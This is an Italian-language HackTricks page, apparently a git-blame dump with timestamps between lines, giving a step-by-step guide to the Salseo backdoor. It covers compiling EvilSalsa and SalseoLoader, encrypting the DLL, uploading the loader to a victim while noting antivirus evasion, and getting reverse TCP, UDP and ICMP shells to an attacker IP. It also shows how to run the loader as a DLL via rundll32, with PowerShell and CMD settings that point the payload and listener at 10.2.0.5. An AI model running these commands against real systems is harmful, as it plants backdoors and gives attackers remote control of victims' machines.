2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
{% hint style="success" %}
Impara e pratica l'hacking su AWS: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Impara e pratica l'hacking su GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
< summary > Supporta HackTricks< / summary >
2023-12-30 10:12:47 +00:00
2024-07-18 17:35:13 +00:00
* Controlla i [**piani di abbonamento** ](https://github.com/sponsors/carlospolop )!
2024-03-17 16:26:31 +00:00
* **Unisciti al** 💬 [**gruppo Discord** ](https://discord.gg/hRep4RUj7f ) o al [**gruppo telegram** ](https://t.me/peass ) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-07-18 17:35:13 +00:00
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repository di Github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 17:35:13 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
## Compilazione dei binari
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Scarica il codice sorgente da GitHub e compila **EvilSalsa** e **SalseoLoader** . Avrai bisogno di **Visual Studio** installato per compilare il codice.
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Compila quei progetti per l'architettura della macchina Windows dove li utilizzerai (se Windows supporta x64, compilali per quell'architettura).
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Puoi **selezionare l'architettura** all'interno di Visual Studio nella scheda ** "Build"** a sinistra in ** "Platform Target".**
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
(\*\*Se non riesci a trovare queste opzioni premi su ** "Project Tab"** e poi su ** "\<Project Name> Properties"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Quindi, compila entrambi i progetti (Build -> Build Solution) (All'interno dei log apparirà il percorso dell'eseguibile):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
## Prepara il Backdoor
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Innanzitutto, dovrai codificare il **EvilSalsa.dll.** Per farlo, puoi utilizzare lo script python **encrypterassembly.py** o puoi compilare il progetto **EncrypterAssembly** :
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-03-17 16:26:31 +00:00
Ora hai tutto il necessario per eseguire tutto il Salseo: il **EvilDalsa.dll codificato** e il **binario di SalseoLoader.**
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
**Carica il binario SalseoLoader.exe sulla macchina. Non dovrebbero essere rilevati da alcun AV...**
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
## **Esegui il backdoor**
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
### **Ottenere una shell TCP inversa (scaricando il dll codificato tramite HTTP)**
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Ricorda di avviare un nc come listener della shell inversa e un server HTTP per servire il malevolo evilsalsa.
2024-02-10 13:03:23 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-03-17 16:26:31 +00:00
### **Ottenere una shell inversa UDP (scaricando dll codificata tramite SMB)**
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Ricorda di avviare un nc come listener della shell inversa e un server SMB per servire l'evilsalsa codificata (impacket-smbserver).
2024-02-10 13:03:23 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-07-18 17:35:13 +00:00
### **Ottenere una shell inversa ICMP (dll già codificata all'interno della vittima)**
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
**Questa volta è necessario uno strumento speciale nel client per ricevere la shell inversa. Scarica:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
#### **Disabilita le risposte ICMP:**
2021-10-18 11:21:18 +00:00
```
2024-02-10 13:03:23 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
2020-07-15 15:43:14 +00:00
```
2024-02-10 13:03:23 +00:00
#### Esegui il client:
```
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
#### All'interno della vittima, eseguiamo la cosa del salseo:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-02-10 13:03:23 +00:00
## Compilazione di SalseoLoader come DLL esportando la funzione principale
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Apri il progetto SalseoLoader usando Visual Studio.
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
### Aggiungi prima della funzione principale: \[DllExport]
2020-07-15 15:43:14 +00:00
2024-03-29 21:03:31 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
### Installa DllExport per questo progetto
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
#### **Strumenti** --> **Gestione pacchetti NuGet** --> **Gestisci pacchetti NuGet per la soluzione...**
2020-07-15 15:43:14 +00:00
2024-03-29 21:03:31 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
#### **Cerca il pacchetto DllExport (usando la scheda Sfoglia), e premi Installa (e accetta il popup)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Nella cartella del tuo progetto sono comparsi i file: **DllExport.bat** e **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
### **Disinstalla DllExport**
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
Premi **Disinstalla** (sì, è strano ma fidati, è necessario)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
### **Esci da Visual Studio ed esegui DllExport\_configure**
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
Semplicemente **esci** da Visual Studio
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Poi, vai nella tua **cartella SalseoLoader** ed **esegui DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Seleziona **x64** (se lo utilizzerai all'interno di una casella x64, come nel mio caso), seleziona **System.Runtime.InteropServices** (all'interno di **Namespace per DllExport** ) e premi **Applica**
2020-07-15 15:43:14 +00:00
2023-12-27 23:58:16 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
### **Apri nuovamente il progetto con Visual Studio**
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
**\[DllExport]** non dovrebbe più essere segnato come errore
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
### Compila la soluzione
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
Seleziona **Tipo di output = Libreria di classi** (Progetto --> Proprietà SalseoLoader --> Applicazione --> Tipo di output = Libreria di classi)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
Seleziona **piattaforma x64** (Progetto --> Proprietà SalseoLoader --> Compila --> Destinazione della piattaforma = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Per **compilare** la soluzione: Compila --> Compila soluzione (Nella console di output apparirà il percorso del nuovo DLL)
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
### Testa il Dll generato
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
Copia e incolla il Dll dove desideri testarlo.
2020-07-15 15:43:14 +00:00
2024-02-10 13:03:23 +00:00
Esegui:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2024-03-17 16:26:31 +00:00
Se non appare alcun errore, probabilmente hai una DLL funzionale!!
2020-07-15 15:43:14 +00:00
2024-03-17 16:26:31 +00:00
## Ottenere una shell utilizzando la DLL
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Non dimenticare di utilizzare un **server** **HTTP** e impostare un **listener nc**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
2020-07-15 15:43:14 +00:00
2024-07-18 17:35:13 +00:00
Il prompt dei comandi (Command Prompt) è un'interfaccia testuale che consente agli utenti di interagire con il sistema operativo utilizzando comandi testuali.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 17:35:13 +00:00
{% hint style="success" %}
Impara e pratica l'hacking su AWS: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Impara e pratica l'hacking su GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 17:35:13 +00:00
< summary > Sostieni HackTricks< / summary >
2023-12-30 10:12:47 +00:00
2024-07-18 17:35:13 +00:00
* Controlla i [**piani di abbonamento** ](https://github.com/sponsors/carlospolop )!
2024-03-17 16:26:31 +00:00
* **Unisciti al** 💬 [**gruppo Discord** ](https://discord.gg/hRep4RUj7f ) o al [**gruppo telegram** ](https://t.me/peass ) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-07-18 17:35:13 +00:00
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repository di Github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 17:35:13 +00:00
{% endhint %}